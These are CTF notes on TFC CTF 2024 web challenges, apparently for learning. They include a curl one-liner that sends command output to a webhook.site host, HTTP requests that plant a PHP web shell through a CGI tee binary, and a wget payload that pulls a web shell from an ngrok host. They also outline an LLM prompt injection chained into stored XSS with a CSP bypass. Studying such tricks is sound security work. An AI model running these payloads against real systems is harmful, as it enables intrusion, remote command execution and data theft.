CTF Notes
Description
Tricks from CTF challenges and some learnings from them
TFC CTF 2024
Web
SURFING
There is an open redirect in Google, but only HTTPS URLs are allowed. By default, the following link will redirect to https://example.com, not http://example.com.
http://google.com/amp/s/example.com
More tricks can be found in this blog, where they used # to bypass the .png that gets appended:
Trusted Domain, Hidden Danger: Deceptive URL Redirections in Email Phishing Attacks (trustwave.com)
SAFE_CONTENT
To bypass the following function, we can use a data URL:
data://text@localhost/plain,<base64>
In a curl command, we can read the stdin (standard input) and send the contents as the body of a POST request using the -d @- argument.
id | base64 | curl -d @- https://webhook.site/<your_webhook_id>
function fetchContent($url) {
$context = stream_context_create([
'http' => [
'timeout' => 5 // Timeout in seconds
]
]);
$content = @file_get_contents($url, false, $context);
if ($content === FALSE) {
$error = error_get_last();
throw new Exception("Unable to fetch content from the URL. Error: " . $error['message']);
}
return base64_decode($content);
}
FUNNY
A HTTPD CGI-bin challenge: We have access to some binaries, and using them, we need to get the flag. Our solution was to use tee to write the content to a file and use it to get the flag.
GET /cgi-bin/tee?/var/www/public/test.php HTTP/1.1
Host: localhost:1337
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Length: 34
<?php system($_GET["cmd"]); ?>
GET /test.php?cmd=cat%20/flag.txt HTTP/1.1
Host: localhost:1337
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Length: 34
This works because in HTTPD, if you send a POST request with some data, it will be encoded and given to STDIN. However, if it’s a GET request, HTTPD will read until the content length and put that into STDIN without encoding. This GET request trick is not documented; we discovered it through experimentation.
Apache Tutorial: Dynamic Content with CGI - Apache HTTP Server Version 2.4
Other payloads include:
curl http://challs.tfcctf.com:30472/cgi-bin/wget?https://9085-{REDACTED}.ngrok-free.app/webshell.php+-O+/var/www/public/webshell.php
The + symbol can be used to split the given inputs as arguments.
SAGIGRAM
Large Language Model (LLM) prompt injection to stored XSS, chained with CSP bypass.
default-src 'self' data:; script-src 'self' https://code.jquery.com/jquery-3.5.1.slim.min.js https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.2/dist/umd/popper.min.js https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js; style-src 'self' 'unsafe-inline' https://stackpath.bootstrapcdn.com
https://book.hacktricks.xyz/pentesting-web/content-security-policy-csp-bypass
We could use a data URI, or there is an upload functionality that only checks for the first file type. For example, if you upload a file with the extension .png.js and there is an LLM that can read the profile picture and add it in the alt tag, you can escape the alt tag and add a script. Read the write-up for more details:
https://siunam321.github.io/ctf/TFC-CTF-2024/Web/SAGIGRAM
ToDo
PNGIPHY
PHISHER
FLASK DESTROYER
TFC CTF 2024 Writeup | siunam’s Website (siunam321.github.io)